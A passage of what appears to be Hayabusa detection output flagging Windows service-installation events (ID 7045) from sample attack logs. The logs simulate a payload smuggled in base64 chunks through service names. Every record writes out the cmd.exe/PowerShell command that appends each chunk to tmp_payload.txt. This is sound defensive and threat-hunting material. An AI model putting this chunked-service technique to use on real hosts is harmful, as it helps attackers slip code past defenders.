start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:42.700 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgDQogICAgIGNhdGNoIHsNCiAgICAgDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gU2VsZWN0IEZvbGRlciINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:19:44.139 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:44.139 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:44.139 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:19:45.593 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:45.593 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:45.593 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:19:47.051 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIERyb3AgRG93biBNZW51 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:47.051 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIERyb3AgRG93biBNZW51 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:47.051 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIERyb3AgRG93biBNZW51 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:19:48.519 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IGJhc2VkIG9uIHRoZSBnaXZlbiBEcm9wIERvd24gT3B0aW9ucw0KDQojQHBhcmFtICREcm9wRG93bk9wdGlvbnMgLT4gIFRoZSBFdmVudCBMb2cgdGhhdCB3aWxsIGJlIGV2YWx1YXRlZCAoU2VjdX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:48.519 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IGJhc2VkIG9uIHRoZSBnaXZlbiBEcm9wIERvd24gT3B0aW9ucw0KDQojQHBhcmFtICREcm9wRG93bk9wdGlvbnMgLT4gIFRoZSBFdmVudCBMb2cgdGhhdCB3aWxsIGJlIGV2YWx1YXRlZCAoU2VjdX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:48.519 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IGJhc2VkIG9uIHRoZSBnaXZlbiBEcm9wIERvd24gT3B0aW9ucw0KDQojQHBhcmFtICREcm9wRG93bk9wdGlvbnMgLT4gIFRoZSBFdmVudCBMb2cgdGhhdCB3aWxsIGJlIGV2YWx1YXRlZCAoU2VjdX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:19:49.957 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: JpdHksIEFwcGxpY2F0aW9uLCBTeXN0ZW0pDQojQHBhcmFtICRUaXRsZSAgICAgICAgICAgLT4gIFRoZSBUaXRsZSBvZiB0aGUgRHJvcCBEb3duIE1lbnUNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:49.957 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JpdHksIEFwcGxpY2F0aW9uLCBTeXN0ZW0pDQojQHBhcmFtICRUaXRsZSAgICAgICAgICAgLT4gIFRoZSBUaXRsZSBvZiB0aGUgRHJvcCBEb3duIE1lbnUNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:49.957 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JpdHksIEFwcGxpY2F0aW9uLCBTeXN0ZW0pDQojQHBhcmFtICRUaXRsZSAgICAgICAgICAgLT4gIFRoZSBUaXRsZSBvZiB0aGUgRHJvcCBEb3duIE1lbnUNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:19:51.401 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtSW5wdXRGcm9tRHJvcERvd24gey | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:51.401 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtSW5wdXRGcm9tRHJvcERvd24gey | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:51.401 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtSW5wdXRGcm9tRHJvcERvd24gey | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:19:52.841 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: BwYXJhbSgkRHJvcERvd25PcHRpb25zLCAkVGl0bGUpDQoNCiAgICAgdHJ5IHsNCiAgICAgDQogICAgICAgIGZ1bmN0aW9uIFJldHVybi1Ecm9wRG93biB7DQogICAgICAgICAgICAkc2NyaXB0OkNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:52.841 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: BwYXJhbSgkRHJvcERvd25PcHRpb25zLCAkVGl0bGUpDQoNCiAgICAgdHJ5IHsNCiAgICAgDQogICAgICAgIGZ1bmN0aW9uIFJldHVybi1Ecm9wRG93biB7DQogICAgICAgICAgICAkc2NyaXB0OkNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:52.841 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: BwYXJhbSgkRHJvcERvd25PcHRpb25zLCAkVGl0bGUpDQoNCiAgICAgdHJ5IHsNCiAgICAgDQogICAgICAgIGZ1bmN0aW9uIFJldHVybi1Ecm9wRG93biB7DQogICAgICAgICAgICAkc2NyaXB0OkNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:19:54.310 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: b2ljZSA9ICREcm9wRG93bi5TZWxlY3RlZEl0ZW0uVG9TdHJpbmcoKQ0KICAgICAgICAgICAgJEZvcm0uQ2xvc2UoKQ0KICAgICAgICB9DQoNCiAgICAgICAgJEZvcm0gPSBOZXctT2JqZWN0IFN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:54.310 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b2ljZSA9ICREcm9wRG93bi5TZWxlY3RlZEl0ZW0uVG9TdHJpbmcoKQ0KICAgICAgICAgICAgJEZvcm0uQ2xvc2UoKQ0KICAgICAgICB9DQoNCiAgICAgICAgJEZvcm0gPSBOZXctT2JqZWN0IFN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:54.310 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b2ljZSA9ICREcm9wRG93bi5TZWxlY3RlZEl0ZW0uVG9TdHJpbmcoKQ0KICAgICAgICAgICAgJEZvcm0uQ2xvc2UoKQ0KICAgICAgICB9DQoNCiAgICAgICAgJEZvcm0gPSBOZXctT2JqZWN0IFN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:19:55.761 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RlbS5XaW5kb3dzLkZvcm1zLkZvcm0NCg0KICAgICAgICAkRm9ybS53aWR0aCA9IDMwMA0KICAgICAgICAkRm9ybS5oZWlnaHQgPSAxNTANCiAgICAgICAgJEZvcm0uVGV4dCA9IOKAnVNlbGVjdCAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:55.761 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RlbS5XaW5kb3dzLkZvcm1zLkZvcm0NCg0KICAgICAgICAkRm9ybS53aWR0aCA9IDMwMA0KICAgICAgICAkRm9ybS5oZWlnaHQgPSAxNTANCiAgICAgICAgJEZvcm0uVGV4dCA9IOKAnVNlbGVjdCAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:55.761 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RlbS5XaW5kb3dzLkZvcm1zLkZvcm0NCg0KICAgICAgICAkRm9ybS53aWR0aCA9IDMwMA0KICAgICAgICAkRm9ybS5oZWlnaHQgPSAxNTANCiAgICAgICAgJEZvcm0uVGV4dCA9IOKAnVNlbGVjdCAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:19:57.214 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VGl0bGXigJ0NCg0KICAgICAgICAkRHJvcERvd24gPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkNvbWJvQm94DQogICAgICAgICREcm9wRG93bi5Mb2NhdGlvbiA9IG5ldy1vYmplY3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:57.214 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VGl0bGXigJ0NCg0KICAgICAgICAkRHJvcERvd24gPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkNvbWJvQm94DQogICAgICAgICREcm9wRG93bi5Mb2NhdGlvbiA9IG5ldy1vYmplY3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:57.214 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VGl0bGXigJ0NCg0KICAgICAgICAkRHJvcERvd24gPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkNvbWJvQm94DQogICAgICAgICREcm9wRG93bi5Mb2NhdGlvbiA9IG5ldy1vYmplY3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:19:58.655 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMTApDQogICAgICAgICREcm9wRG93bi5TaXplID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEzMCwzMCkNCg0KICAgICAgICBGb3JFYWNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:58.655 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMTApDQogICAgICAgICREcm9wRG93bi5TaXplID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEzMCwzMCkNCg0KICAgICAgICBGb3JFYWNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:58.655 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMTApDQogICAgICAgICREcm9wRG93bi5TaXplID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEzMCwzMCkNCg0KICAgICAgICBGb3JFYWNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:20:00.108 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICgkSXRlbSBpbiAkRHJvcERvd25PcHRpb25zKSB7DQogICAgICAgICBbdm9pZF0gJERyb3BEb3duLkl0ZW1zLkFkZCgkSXRlbSkNCiAgICAgICAgfQ0KDQogICAgICAgICRGb3JtLkNvbnRyb2xzLk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:00.108 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICgkSXRlbSBpbiAkRHJvcERvd25PcHRpb25zKSB7DQogICAgICAgICBbdm9pZF0gJERyb3BEb3duLkl0ZW1zLkFkZCgkSXRlbSkNCiAgICAgICAgfQ0KDQogICAgICAgICRGb3JtLkNvbnRyb2xzLk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:00.108 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICgkSXRlbSBpbiAkRHJvcERvd25PcHRpb25zKSB7DQogICAgICAgICBbdm9pZF0gJERyb3BEb3duLkl0ZW1zLkFkZCgkSXRlbSkNCiAgICAgICAgfQ0KDQogICAgICAgICRGb3JtLkNvbnRyb2xzLk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
